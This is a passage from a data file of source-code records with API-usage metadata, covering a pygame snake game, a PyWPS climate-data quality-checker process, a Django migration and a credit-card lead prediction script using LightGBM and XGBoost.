"django.contrib.auth.models.User.objects", "line_number": 150, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 150, "usage_type": "name"}, {"api_name": "models.UserExtra", "line_number": 151, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects.get", "line_number": 154, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 154, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 154, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 158, "usage_type": "call"}, {"api_name": "django.views.View", "line_number": 161, "usage_type": "name"}, {"api_name": "django.contrib.auth.logout", "line_number": 163, "usage_type": "call"}, {"api_name": "django.http.response.HttpResponseRedirect", "line_number": 165, "usage_type": "call"}, {"api_name": "django.views.View", "line_number": 168, "usage_type": "name"}, {"api_name": "forms.LoginForm", "line_number": 170, "usage_type": "call"}, {"api_name": "django.template.response.TemplateResponse", "line_number": 172, "usage_type": "call"}, {"api_name": "forms.LoginForm", "line_number": 175, "usage_type": "call"}, {"api_name": "django.contrib.auth.authenticate", "line_number": 179, "usage_type": "call"}, {"api_name": "django.contrib.auth.login", "line_number": 183, "usage_type": "call"}, {"api_name": "django.http.response.HttpResponseRedirect", "line_number": 185, "usage_type": "call"}, {"api_name": "forms.LoginForm", "line_number": 188, "usage_type": "call"}, {"api_name": "django.template.response.TemplateResponse", "line_number": 190, "usage_type": "call"}, {"api_name": "django.template.response.TemplateResponse", "line_number": 194, "usage_type": "call"}, {"api_name": "django.views.View", "line_number": 196, "usage_type": "name"}, {"api_name": "forms.RegisterForm", "line_number": 198, "usage_type": "call"}, {"api_name": "django.template.response.TemplateResponse", "line_number": 200, "usage_type": "call"}, {"api_name": "forms.RegisterForm", "line_number": 203, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects.create_user", "line_number": 209, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 209, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 209, "usage_type": "name"}, {"api_name": "models.UserExtra", "line_number": 210, "usage_type": "call"}, {"api_name": 
"django.contrib.auth.login", "line_number": 213, "usage_type": "call"}, {"api_name": "django.http.response.HttpResponseRedirect", "line_number": 214, "usage_type": "call"}, {"api_name": "forms.RegisterForm", "line_number": 218, "usage_type": "call"}, {"api_name": "django.template.response.TemplateResponse", "line_number": 220, "usage_type": "call"}, {"api_name": "django.template.response.TemplateResponse", "line_number": 224, "usage_type": "call"}, {"api_name": "django.contrib.auth.mixins.LoginRequiredMixin", "line_number": 231, "usage_type": "name"}, {"api_name": "django.views.View", "line_number": 231, "usage_type": "name"}, {"api_name": "django.template.response.TemplateResponse", "line_number": 233, "usage_type": "call"}, {"api_name": "rest_framework.views.APIView", "line_number": 253, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 259, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 261, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 262, "usage_type": "call"}, {"api_name": "models.Tweet.objects.order_by", "line_number": 263, "usage_type": "call"}, {"api_name": "models.Tweet.objects", "line_number": 263, "usage_type": "attribute"}, {"api_name": "models.Tweet", "line_number": 263, "usage_type": "name"}, {"api_name": "models.Tweet.objects.filter", "line_number": 265, "usage_type": "call"}, {"api_name": "models.Tweet.objects", "line_number": 265, "usage_type": "attribute"}, {"api_name": "models.Tweet", "line_number": 265, "usage_type": "name"}, {"api_name": "serializers.TweetSerializer", "line_number": 266, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 267, "usage_type": "call"}, {"api_name": "serializers.TweetSerializer", "line_number": 270, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 273, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 273, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 273, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 274, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 274, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 274, "usage_type": "name"}]} +{"seq_id": "602390429", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport random\nimport time\n\nimport pygame\n\nfrom scenes import GameOver, Intro\nimport color\nimport constants\nimport utils\n\n\nclass SpartanSlither(object):\n\n def __init__(self, resolution=constants.RESOLUTION, fps=constants.FPS):\n pygame.init()\n\n if not isinstance(resolution, (tuple, list)):\n raise TypeError(\n \"{} is not a valid resolution. 
Was expecting tuple or \"\n \"list\".format(resolution)\n )\n self.resolution = utils.Resolution(*resolution)\n\n self.clock = pygame.time.Clock()\n self.fps = fps\n self.display = pygame.display.set_mode(self.resolution)\n pygame.display.set_caption(\"Spartan Slither\")\n\n self.background_color = color.WHITE\n\n self.sparty_image = pygame.image.load(\"resources/sparty.png\")\n self.block_s = pygame.image.load(\"resources/ms_block_s.png\")\n self.wolvie_image = pygame.image.load(\"resources/wolvie.png\")\n self.block_w = pygame.image.load(\"resources/block_w.png\")\n\n def initialize_start(self):\n self.level = 10\n self.speed = 10\n\n self.display.fill(self.background_color)\n self.game_exit = False\n self.game_over = False\n self.lead_x = self.resolution.width / 2\n self.lead_y = self.resolution.height / 2\n self.lead_x_change = 10\n self.lead_y_change = 0\n\n self.sparty_size = 20\n self.sparty_head = (self.lead_x, self.lead_y)\n self.sparty_list = [self.sparty_head]\n self.sparty_length = 1\n self.wolvie_size = 20\n self.wolvie = utils.Wolvie(0, 0, 0, 0)\n\n def run(self):\n self.intro_loop()\n while not self.game_exit:\n self.sparty_head = (self.lead_x, self.lead_y)\n self.is_game_over()\n self.handle_events()\n self.check_location()\n self.update()\n self.clock.tick(self.fps)\n\n self.exit()\n\n def handle_events(self):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.game_exit = True\n\n if event.type == pygame.KEYDOWN:\n self.keydown_event(event)\n\n self.lead_x += self.lead_x_change\n self.lead_y += self.lead_y_change\n\n def keydown_event(self, event):\n \"\"\" Logic for handling keydown event \"\"\"\n if event.key == pygame.K_q:\n self.game_exit = True\n if event.key == pygame.K_LEFT:\n self.lead_x_change = self.speed * -1\n self.lead_y_change = 0\n elif event.key == pygame.K_RIGHT:\n self.lead_x_change = self.speed\n self.lead_y_change = 0\n elif event.key == pygame.K_UP:\n self.lead_y_change = self.speed * -1\n self.lead_x_change = 0\n elif event.key == pygame.K_DOWN:\n self.lead_y_change = self.speed\n self.lead_x_change = 0\n\n def update(self):\n self.display.fill(self.background_color)\n self.draw_wolvie()\n self.draw_sparty()\n pygame.display.update()\n\n def draw_sparty(self):\n if len(self.sparty_list) > self.sparty_length:\n del self.sparty_list[0]\n\n if self.lead_x_change or self.lead_y_change:\n self.sparty_list.append(self.sparty_head)\n\n sparty_image = self._get_sparty_image()\n self.display.blit(sparty_image, self.sparty_list[-1])\n\n for x_pos, y_poz in self.sparty_list[:-1]:\n pygame.draw.rect(\n self.display, color.SPARTAN,\n [x_pos, y_poz, self.sparty_size, self.sparty_size]\n )\n\n def _get_sparty_image(self):\n if self.lead_x_change < 0:\n sparty_rotated = pygame.transform.flip(\n self.sparty_image, True, False)\n else:\n rotation = utils.get_rotation(\n self.lead_x_change, self.lead_y_change\n )\n sparty_rotated = pygame.transform.rotate(\n self.sparty_image, rotation)\n return sparty_rotated\n\n def draw_wolvie(self):\n if not (self.wolvie.x or self.wolvie.y):\n x_max = self.resolution.width - self.wolvie_size\n y_max = self.resolution.height - self.wolvie_size\n self.wolvie = utils.Wolvie(\n x=round(random.randrange(0, x_max)),\n y=round(random.randrange(0, y_max)),\n x_size=self.wolvie_size,\n y_size=self.wolvie_size\n )\n self.display.blit(self.wolvie_image, self.wolvie.dimensions)\n\n def check_location(self):\n self._check_boundary_collision()\n self._did_sparty_destroy_wolvie()\n\n if len(self.sparty_list) > 1:\n for 
segment in self.sparty_list[:-1]:\n if segment == self.sparty_head:\n self.game_over = True\n\n def _check_boundary_collision(self):\n if (\n self.lead_x + self.sparty_size > self.resolution.width or\n self.lead_x < 0 or\n self.lead_y + self.sparty_size > self.resolution.height or\n self.lead_y < 0\n ):\n self.game_over = True\n\n def _did_sparty_destroy_wolvie(self):\n \"\"\"\n Checks collision of Sparty with the wolverine. This takes into account\n if they are different sizes\n \"\"\"\n sparty_size = self.lead_x + self.sparty_size\n wolvie_size = self.wolvie.x + self.wolvie_size\n if (\n self.lead_x >= self.wolvie.x and self.lead_x <= wolvie_size or\n sparty_size >= self.wolvie.x and sparty_size <= wolvie_size\n ):\n sparty_size = self.lead_y + self.sparty_size\n wolvie_size = self.wolvie.y + self.wolvie_size\n if (\n self.lead_y >= self.wolvie.y and self.lead_y <= wolvie_size or\n sparty_size >= self.wolvie.y and sparty_size <= wolvie_size\n ):\n self.wolvie.x = 0\n self.wolvie.y = 0\n self.sparty_length += 5\n\n def is_game_over(self):\n if self.game_over:\n exit_game = GameOver(\n display=self.display, pygame=pygame,\n clock=self.clock,\n image=self.block_w,\n resolution=self.resolution\n ).run()\n if exit_game:\n self.game_exit = True\n else:\n self.initialize_start()\n\n def exit(self):\n \"\"\" Handle exiting the game, show a message, close it all down nicely.\n \"\"\"\n self.display.fill(color.SPARTAN)\n utils.Renderer.display_message_to_screen(\n self.display, self.resolution, \"Go Green! Go White!\",\n self.background_color, pygame, y_displacement=-100,\n font_size=constants.MEDIUM\n )\n\n utils.Renderer.render_block_letter_image(\n self.display, self.block_s, self.resolution\n )\n\n utils.Renderer.display_message_to_screen(\n self.display, self.resolution, \"Thanks for playing!\",\n self.background_color, pygame, y_displacement=100\n )\n pygame.display.update()\n time.sleep(2)\n\n pygame.quit()\n quit()\n\n def intro_loop(self):\n start = Intro(\n display=self.display, pygame=pygame, clock=self.clock,\n resolution=self.resolution\n ).run()\n if start:\n self.initialize_start()\n else:\n self.game_exit = True\n\n\nif __name__ == \"__main__\":\n SpartanSlither().run()\n", "sub_path": "src/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 7563, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "constants.RESOLUTION", "line_number": 17, "usage_type": "attribute"}, {"api_name": "constants.FPS", "line_number": 17, "usage_type": "attribute"}, {"api_name": "pygame.init", "line_number": 18, "usage_type": "call"}, {"api_name": "utils.Resolution", "line_number": 25, "usage_type": "call"}, {"api_name": "pygame.time.Clock", "line_number": 27, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 27, "usage_type": "attribute"}, {"api_name": "pygame.display.set_mode", "line_number": 29, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 29, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 30, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 30, "usage_type": "attribute"}, {"api_name": "color.WHITE", "line_number": 32, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 34, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 34, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 35, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 
35, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 36, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 36, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 37, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 37, "usage_type": "attribute"}, {"api_name": "utils.Wolvie", "line_number": 56, "usage_type": "call"}, {"api_name": "pygame.event.get", "line_number": 71, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 71, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 72, "usage_type": "attribute"}, {"api_name": "pygame.KEYDOWN", "line_number": 75, "usage_type": "attribute"}, {"api_name": "pygame.K_q", "line_number": 83, "usage_type": "attribute"}, {"api_name": "pygame.K_LEFT", "line_number": 85, "usage_type": "attribute"}, {"api_name": "pygame.K_RIGHT", "line_number": 88, "usage_type": "attribute"}, {"api_name": "pygame.K_UP", "line_number": 91, "usage_type": "attribute"}, {"api_name": "pygame.K_DOWN", "line_number": 94, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 102, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 102, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 115, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 115, "usage_type": "attribute"}, {"api_name": "color.SPARTAN", "line_number": 116, "usage_type": "attribute"}, {"api_name": "pygame.transform.flip", "line_number": 122, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 122, "usage_type": "attribute"}, {"api_name": "utils.get_rotation", "line_number": 125, "usage_type": "call"}, {"api_name": "pygame.transform.rotate", "line_number": 128, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 128, "usage_type": "attribute"}, {"api_name": "utils.Wolvie", "line_number": 136, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 137, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 138, "usage_type": "call"}, {"api_name": "scenes.GameOver", "line_number": 185, "usage_type": "call"}, {"api_name": "color.SPARTAN", "line_number": 199, "usage_type": "attribute"}, {"api_name": "utils.Renderer.display_message_to_screen", "line_number": 200, "usage_type": "call"}, {"api_name": "utils.Renderer", "line_number": 200, "usage_type": "attribute"}, {"api_name": "constants.MEDIUM", "line_number": 203, "usage_type": "attribute"}, {"api_name": "utils.Renderer.render_block_letter_image", "line_number": 206, "usage_type": "call"}, {"api_name": "utils.Renderer", "line_number": 206, "usage_type": "attribute"}, {"api_name": "utils.Renderer.display_message_to_screen", "line_number": 210, "usage_type": "call"}, {"api_name": "utils.Renderer", "line_number": 210, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 214, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 214, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 215, "usage_type": "call"}, {"api_name": "pygame.quit", "line_number": 217, "usage_type": "call"}, {"api_name": "scenes.Intro", "line_number": 221, "usage_type": "call"}]} +{"seq_id": "131126774", "text": "import tarfile\n\nfrom pywps import Process\nfrom pywps import LiteralInput\nfrom pywps import ComplexInput, ComplexOutput\nfrom pywps import Format\nfrom pywps.app.Common import Metadata\n\nimport logging\nLOGGER = logging.getLogger(\"PYWPS\")\n\n\nclass 
QualityChecker(Process):\n def __init__(self):\n inputs = [\n ComplexInput('dataset', 'NetCDF File',\n abstract='You may provide a URL or upload a NetCDF file.',\n min_occurs=1,\n max_occurs=1024,\n supported_formats=[Format('application/x-netcdf')]),\n LiteralInput('project', 'Project',\n data_type='string',\n abstract=\"Climate model data project to be checked: CORDEX or CMIP5\",\n min_occurs=1,\n max_occurs=1,\n default='CORDEX',\n allowed_values=['CORDEX', 'CMIP5']),\n ]\n outputs = [\n ComplexOutput('output', 'Quality Checker Report',\n abstract=\"Quality checker results as tar archive.\",\n as_reference=True,\n supported_formats=[Format('application/x-tar-gz')]),\n ComplexOutput('logfile', 'Quality Checker Logfile',\n abstract=\"Quality checker summary logfile\",\n as_reference=True,\n supported_formats=[Format('text/yaml')]),\n ]\n\n super(QualityChecker, self).__init__(\n self._handler,\n identifier=\"qa_checker\",\n title=\"Quality Assurance Checker by DKRZ\",\n version=\"0.6.3\",\n abstract=\"The Quality Assurance checker QA-DKRZ checks conformance of meta-data of climate simulations\"\n \" given in NetCDF format with conventions and rules of climate model projects.\"\n \" At present, checking of CF Conventions, CMIP5, and CORDEX is supported.\"\n \" Development and maintenance for the QA checker is done by the\"\n \" German Climate Computing Centre (DKRZ).\"\n \" If you have suggestions for improvement then please contact\"\n \" Heinz-Dieter Hollweg at DKRZ (hollweg@dkrz.de).\",\n metadata=[\n Metadata('Birdhouse', 'http://bird-house.github.io/'),\n Metadata('User Guide', 'http://birdhouse-hummingbird.readthedocs.io/en/latest/'),\n Metadata('CF Conventions', 'http://cfconventions.org/'),\n Metadata('QA Checker Documentation', 'http://qa-dkrz.readthedocs.io/en/latest/'),\n Metadata('Conda Package', 'http://anaconda.org/birdhouse/qa-dkrz'),\n Metadata('GitHub', 'https://github.com/IS-ENES-Data/QA-DKRZ'),\n ],\n inputs=inputs,\n outputs=outputs,\n status_supported=True,\n store_supported=True,\n )\n\n def _handler(self, request, response):\n from hummingbird.processing import hdh_qa_checker\n\n response.update_status(\"starting qa checker ...\", 0)\n\n datasets = [dataset.file for dataset in request.inputs['dataset']]\n logfile = results_path = None\n for idx, ds in enumerate(datasets):\n progress = idx * 100 / len(datasets)\n response.update_status(\"checking %s\" % ds, progress)\n logfile, results_path = hdh_qa_checker(ds, project=request.inputs['project'][0].data)\n if logfile and results_path:\n # output tar archive\n with tarfile.open('output.tar.gz', \"w:gz\") as tar:\n response.outputs['output'].file = tar.name\n tar.add(results_path)\n response.outputs['logfile'].file = logfile\n\n response.update_status(\"qa checker done.\", 100)\n return response\n", "sub_path": "hummingbird/processes/wps_hdh_qachecker.py", "file_name": "wps_hdh_qachecker.py", "file_ext": "py", "file_size_in_byte": 3916, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.getLogger", "line_number": 10, "usage_type": "call"}, {"api_name": "pywps.Process", "line_number": 13, "usage_type": "name"}, {"api_name": "pywps.ComplexInput", "line_number": 16, "usage_type": "call"}, {"api_name": "pywps.Format", "line_number": 20, "usage_type": "call"}, {"api_name": "pywps.LiteralInput", "line_number": 21, "usage_type": "call"}, {"api_name": "pywps.ComplexOutput", "line_number": 30, "usage_type": "call"}, {"api_name": "pywps.Format", 
"line_number": 33, "usage_type": "call"}, {"api_name": "pywps.ComplexOutput", "line_number": 34, "usage_type": "call"}, {"api_name": "pywps.Format", "line_number": 37, "usage_type": "call"}, {"api_name": "pywps.app.Common.Metadata", "line_number": 53, "usage_type": "call"}, {"api_name": "pywps.app.Common.Metadata", "line_number": 54, "usage_type": "call"}, {"api_name": "pywps.app.Common.Metadata", "line_number": 55, "usage_type": "call"}, {"api_name": "pywps.app.Common.Metadata", "line_number": 56, "usage_type": "call"}, {"api_name": "pywps.app.Common.Metadata", "line_number": 57, "usage_type": "call"}, {"api_name": "pywps.app.Common.Metadata", "line_number": 58, "usage_type": "call"}, {"api_name": "hummingbird.processing.hdh_qa_checker", "line_number": 76, "usage_type": "call"}, {"api_name": "tarfile.open", "line_number": 79, "usage_type": "call"}]} +{"seq_id": "276878867", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('web', '0008_auto_20150427_0106'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='designer',\n name='bank_account_bank',\n field=models.CharField(max_length=30, null=True),\n ),\n migrations.AlterField(\n model_name='designer',\n name='bank_account_name',\n field=models.CharField(max_length=100, null=True),\n ),\n migrations.AlterField(\n model_name='designer',\n name='bank_account_number',\n field=models.CharField(max_length=30, null=True),\n ),\n ]\n", "sub_path": "web/migrations/0009_auto_20150427_1950.py", "file_name": "0009_auto_20150427_1950.py", "file_ext": "py", "file_size_in_byte": 777, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 7, "usage_type": "name"}, {"api_name": "django.db.migrations.AddField", "line_number": 14, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 14, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 17, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 17, "usage_type": "name"}, {"api_name": "django.db.migrations.AlterField", "line_number": 19, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 19, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 22, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 22, "usage_type": "name"}, {"api_name": "django.db.migrations.AlterField", "line_number": 24, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 24, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 27, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 27, "usage_type": "name"}]} +{"seq_id": "412491815", "text": "#Importing necessary Libraries\r\nimport pandas as pd\r\nimport seaborn as sns\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport sklearn\r\nfrom sklearn import preprocessing\r\nfrom sklearn.preprocessing import LabelEncoder\r\nimport warnings\r\nimport os\r\nwarnings.filterwarnings('ignore')\r\nsns.set_style('whitegrid')\r\n\r\n#Reading files\r\ntrain_data=pd.read_csv(os.getcwd() +'\\Customer_trainfile.csv')\r\ntest=pd.read_csv(os.getcwd() + '\\Customer_testfile.csv')\r\n\r\nprint(train_data.shape) #(245725, 11)\r\nprint(test.shape) 
#(105312, 10)\r\n\r\n#checking datatypes-----Age,Vintage,Avg_acc_bal,is_lead are int, remaining are object\r\nprint(train_data.info())\r\nprint(test.info())\r\n\r\nprint(train_data.nunique())\r\nprint(test.nunique())\r\n\r\n#Descriptive stats for Numeric Variables(train_data)\r\nNumStats=train_data.describe()\r\npd.set_option('display.max_columns',None)\r\nprint(NumStats)\r\n\r\n#Descriptive stats for Numeric Variables(test)\r\nNumStats=test.describe()\r\nprint(NumStats)\r\n\r\n#Checking Missing values---Credit_Product has missing Values\r\nprint(train_data.isnull().sum()) #29325 missing values\r\nprint(test.isnull().sum()) #12522 missing values\r\n\r\nprint(train_data['Credit_Product'].value_counts()) # No: 144357 , Yes: 72043\r\nprint(test['Credit_Product'].value_counts()) # No: 61608 , Yes: 31182\r\n\r\n#Filling the missing Values\r\ntrain_data['Credit_Product'].replace(np.nan,'Yes',inplace=True)\r\nprint(train_data.isnull().sum())\r\ntest['Credit_Product'].replace(np.nan,'Yes',inplace=True)\r\nprint(test.isnull().sum())\r\n\r\n\r\n#EDA---Exploratory Data Analysis(Univariate , Bivariate)\r\n#Train_data analysis\r\n#Target variable\r\nsns.countplot(train_data['Is_Lead'])\r\nplt.title('Is_Lead', fontsize = 10)\r\nfig1=plt.show()\r\n\r\n#Age Variable\r\ntrain_data.Age.hist()\r\nplt.title('Histogram of Age')\r\nplt.xlabel('Age')\r\nplt.ylabel('Frequency')\r\nfig2=plt.show()\r\n#concl: Most of the customers of the bank in this dataset are in the age range of 20-30.\r\n\r\n# Gender vs Is_Lead\r\nsns.countplot(x='Gender',hue='Is_Lead',data=train_data,palette='husl')\r\nfig3=plt.show()\r\n# Conclusion: Customers who bought a credit card are mostly male; fewer females have bought one\r\n\r\n#Occupation vs Is_Lead\r\nsns.countplot(x='Occupation',hue='Is_Lead',data=train_data,palette='husl')\r\nfig4=plt.show()\r\n#Concl: Mostly self-employed customers have bought a credit card, and entrepreneurs the least\r\n\r\n# Credit_Product vs Occupation\r\nsns.countplot(x='Credit_Product',hue='Occupation',data=train_data,palette='husl')\r\nfig5=plt.show()\r\n# Nearly 33000 self-employed customers have an active credit product, so there is a possibility that self-employed customers may buy another credit card\r\n\r\n# Is_active vs Is_Lead\r\nsns.countplot(x='Is_Active',hue='Is_Lead',data=train_data,palette='husl')\r\nfig6=plt.show()\r\n#concl: Approx 25000 (20-21%) customers are active and interested to buy a credit card (lead),\r\n#and 30000-32000 (approx 25-27%) customers are not active but still interested to buy a credit card (lead)\r\n\r\n# #Vintage variable analysis\r\nplt.figure(figsize=(13,7))\r\nplt.subplot(2,1,1)\r\nsns.distplot(train_data['Vintage'], color='green')\r\nplt.title(\"Vintage\")\r\nfig7=plt.show()\r\n\r\n# test data Analysis\r\n#Age Variable\r\ntest.Age.hist()\r\nplt.title('Histogram of Age')\r\nplt.xlabel('Age')\r\nplt.ylabel('Frequency')\r\nfig2a=plt.show()\r\n\r\n# Credit_Product vs Occupation\r\nsns.countplot(x='Credit_Product',hue='Occupation',data=test,palette='husl')\r\nfig5a=plt.show()\r\n\r\n# #Vintage variable analysis\r\nplt.figure(figsize=(13,7))\r\nplt.subplot(2,1,1)\r\nsns.distplot(test['Vintage'], color='green')\r\nplt.title(\"Vintage\")\r\nfig7a=plt.show()\r\n\r\n\r\n# Checking Avg_Account_Balance for Skewness and removing skewness.\r\n#Train\r\nsns.distplot(train_data['Avg_Account_Balance'])\r\nfig8=plt.show()\r\ntrain_data['Avg_Account_Balance'] = train_data['Avg_Account_Balance'].map(lambda i: np.log(i) if i > 0 else 
0)\r\nsns.distplot(train_data['Avg_Account_Balance'])\r\nfig8ab=plt.show()\r\n#Test\r\nsns.distplot(test['Avg_Account_Balance'])\r\nfig9=plt.show()\r\ntest['Avg_Account_Balance'] = np.log(test['Avg_Account_Balance'])\r\nsns.distplot(test['Avg_Account_Balance'])\r\nfig9ab=plt.show()\r\n\r\n#Dropping the ID column\r\ntrain_data.drop(['ID'],axis=1,inplace=True)\r\ntest.drop(['ID'],axis=1, inplace=True)\r\n\r\nprint(train_data.dtypes)\r\nprint(test.dtypes)\r\n\r\n#Converting Categorical Var to numeric\r\nfrom sklearn.preprocessing import LabelEncoder\r\nle=LabelEncoder()\r\ncolname= ['Gender','Region_Code','Occupation','Channel_Code','Credit_Product','Is_Active']\r\nfor a in colname:\r\n train_data[a] = le.fit_transform(train_data[a])\r\n test[a] = le.fit_transform(test[a])\r\nprint(train_data)\r\nprint(test)\r\n\r\n# Applying Cross validation and calculating roc-auc score\r\n# Removing target var 'Is_Lead' from train_data and storing in another var\r\nX=train_data.drop('Is_Lead',axis=1)\r\ny=train_data['Is_Lead']\r\n\r\nfrom sklearn.model_selection import KFold , StratifiedKFold\r\nfrom sklearn.metrics import roc_auc_score\r\n\r\n\r\ndef cross_val(X, y, model, params, folds=9):\r\n skf = StratifiedKFold(n_splits=folds, shuffle=True, random_state=21)\r\n for fold, (train_idx, test_idx) in enumerate(skf.split(X, y)):\r\n print(f\"Fold: {fold}\")\r\n x_train, y_train = X.iloc[train_idx], y.iloc[train_idx]\r\n x_test, y_test = X.iloc[test_idx], y.iloc[test_idx]\r\n\r\n algo = model(**params)\r\n algo.fit(x_train, y_train, eval_set=[(x_test, y_test)], early_stopping_rounds=100, verbose=400)\r\n pred = algo.predict_proba(x_test)[:, 1]\r\n roc_score = roc_auc_score(y_test, pred)\r\n print(f\"roc_auc_score: {roc_score}\")\r\n print(\"-\" * 50)\r\n return algo\r\n\r\n#Light Gradient Boosting Algorithm\r\nlgbm_params = {'learning_rate': 0.1,'n_estimators': 20000, 'max_bin': 94,'num_leaves': 12,'max_depth': 30,'reg_alpha': 8.457,\r\n 'reg_lambda': 6.853,'subsample': 1.0}\r\nfrom lightgbm import LGBMClassifier\r\nlgb_model = cross_val(X, y, LGBMClassifier, lgbm_params)\r\npredict_test_lgb=lgb_model.predict_proba(test)[:, 1]\r\nsubmission = pd.DataFrame({'Is_Lead': predict_test_lgb})\r\nsubmission.to_csv('C:/Users/hp/Desktop/submission_LgbmClassifier1.csv',index=False)\r\n#roc_auc_score: 0.8525869220635909\r\n\r\n\r\n#eXtreme Gradient Boosting (XGBoost) Algorithm\r\nxgbm_params= {'n_estimators': 20000, 'max_depth': 5, 'learning_rate': 0.03, 'reg_lambda': 29.326, 'subsample': 0.818,\r\n 'colsample_bytree': 0.235, 'colsample_bynode': 0.81, 'colsample_bylevel': 0.453}\r\nfrom xgboost import XGBClassifier\r\nxgbm_model = cross_val(X, y, XGBClassifier, xgbm_params)\r\npredict_test_xgbm=xgbm_model.predict_proba(test)[:, 1]\r\nsubmission = pd.DataFrame({'Is_Lead': predict_test_xgbm})\r\nsubmission.to_csv('C:/Users/hp/Desktop/submission_xgbmClassifier.csv',index=False)\r\n#roc_auc_score: 0.8484759668139442\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n", "sub_path": "CCLead.py", "file_name": "CCLead.py", "file_ext": "py", "file_size_in_byte": 6723, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "warnings.filterwarnings", "line_number": 11, "usage_type": "call"}, {"api_name": "seaborn.set_style", "line_number": 12, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 15, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 15, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 16, "usage_type": "call"}, 
{"api_name": "os.getcwd", "line_number": 16, "usage_type": "call"}, {"api_name": "pandas.set_option", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 45, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 47, "usage_type": "attribute"}, {"api_name": "seaborn.countplot", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 60, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 61, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 62, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 63, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 63, "usage_type": "name"}, {"api_name": "seaborn.countplot", "line_number": 67, "usage_type": 